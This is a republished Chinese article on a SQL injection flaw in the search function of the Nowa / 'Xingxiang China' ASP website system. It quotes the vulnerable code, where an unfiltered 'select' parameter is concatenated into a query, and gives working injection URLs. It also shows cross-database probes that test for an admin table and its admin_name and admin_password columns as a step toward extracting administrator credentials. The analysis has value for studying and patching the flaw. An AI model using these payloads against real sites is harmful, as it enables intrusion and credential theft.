分享
 
 
 

对形象中国全站系统的搜索注入漏洞的一点分析

王朝other·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

首先声明,这个漏洞不是我发现的,我只是作了一次的分析,不足之处请不吝指教。

这个站点在当初被认为是比较安全的全站系统,事实上现在也是。(后来的补丁里出现了上传漏洞,不在讨论之列。)因此这个系统被改编为很多版本:

Nowa 0.94版本(原版)

形象中国整站(修改版本)

蓝雨整站(修改版本)

落日整站(修改版本)

流星整站(修改版本)---------------------------------------------(感谢hak_ban提供)

我的站http://www.918x.com就是这个系统的,还有很多的站点用到这个系统(包括小路的666w.com,嘿嘿)。

我们先来看漏洞文件的原代码:

<%sub article_body()

dim totalart,Currentpage,totalpages,i,j,colname

openarticle

sql="select art_id,cat_id,art_title,art_date,art_count from art order by art_date DESC"

if request("cat_id")<>"" then

sql="select art_id,cat_id,art_title,art_date,art_count from art where cat_id="&request("cat_id")&" order by art_date DESC"

elseif request("keyword")<>"" then

sql="select art_id,cat_id,art_title,art_date,art_count from art where "&request("select")&" like %"&request("keyword")&"%order by art_date DESC"

elseif request("cat_id")<>"" and request("keyword")<>"" then

sql="select art_id,cat_id,art_title,art_date,art_count from art where art_title or art_content like %"&request("keyword")&"%order by art_date DESC"

end if

set rs=server.createobject("adodb.recordset")

rs.open sql,conn,1,1

%>

关键这句:sql="select art_id,cat_id,art_title,art_date,art_count from art where "&request("select")&" like %"&request("keyword")&"%order by art_date DESC"

我们从另一个文件FORMAT.asp里发现文件对request的keyword变量进行了过滤,却没有对request的select进行有 效检查。

所以当我们提交(%20是空格)

_title&keyword=1%20and%201=1" target=_blank>http://www.918x.com/article.asp?select=art_title&keyword=1%20and%201=1

是不成功的,但是提交:

_blank>http://www.918x.com/article.asp? keyword=1&select=art_title%20and%201=1

_blank>http://www.918x.com/article.asp? keyword=1&select=art_title%20and%201=2

就能成功的达到注入的目的。

整个文章系统有两处搜索,除了article.asp还有download.asp,于是看了看代码,却没有发现&request("select"),而是直接把soft_name等放在查询中,看起来好象这两个查询不是同一个人写的。

再来说说利用。我们知道,这个整站有5个数据库,密码保存在admin.mdb里(默认情况下)。

而上述注入只是征对article.mdb的。我们最多能够暴出article.mdb表里的数据。

那能不能跨库查询呢?

首先我必须知道保存admin的数据库的名字,假设为admin.asp,我们还需要知道数据库的物理路径,假设为d:\web\data\ 然后如下查询:

_blank>http://www.918x.com/article.asp? keyword=1&select=art_title%20and %200<>(select%20count(*)%20from%20d:\web\data\admin.asp.admin%20where%20admin_name)

_blank>http://www.918x.com/article.asp? keyword=1&select=art_title%20and %200<>(select%20count(*)%20from%20d:\web\data\admin.asp.admin%20where%20admin_password)

返回成功,则说明有admin表和admin_name,admin_password列。

接下来便可以注入,暴出用户名和密码来。我就不多说了,大家都会的。

这种情况适用于

1.知道数据库的物理路径

2.数据库不在可访问的web目录里,在上级目录,或者其他地方,或者数据库作了防下载处理(否则我们可以直接下载admin数据库,又何必注入那么麻烦呢。)

总的来说利用的价值不大,何况20040415的补丁使得密码还是md5加密的

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有